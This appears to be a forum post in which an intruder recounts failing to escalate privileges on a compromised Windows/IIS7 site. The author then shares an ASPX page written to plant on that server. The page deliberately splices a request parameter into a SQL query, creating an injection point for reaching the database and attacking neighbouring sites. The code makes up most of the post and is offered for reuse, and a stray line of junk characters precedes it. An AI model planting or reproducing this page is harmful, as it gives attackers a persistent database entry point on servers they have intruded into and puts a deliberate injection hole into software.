Yesterday 4z1 and I were looking at a site; privilege escalation was really hard. We looked at it for a full 5 hours with no result. 2008+iis7, no sa, no root, none of the usual services...
Actually, in the middle of it we used aspx to construct an injection point to go cross-site. I found a pile of code online, and not a single one worked.
It's not much code, so I just wrote one myself. Annoying as hell.
3 O. f, @9 D l! o" }' k
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 ASPX constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    // "连接名" is a placeholder: the name of a connection string defined in web.config
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // the parameter, e.g. ?xxser=1

    // [表] and 列名 are placeholders for the table and column; the raw parameter is
    // concatenated straight into the SQL text, which is what makes this page injectable
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery still executes the statement, but returns -1 for a SELECT,
    // so x is always -1 unless the query throws
    int x = command.ExecuteNonQuery();
    Response.Write(i+"\n");
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>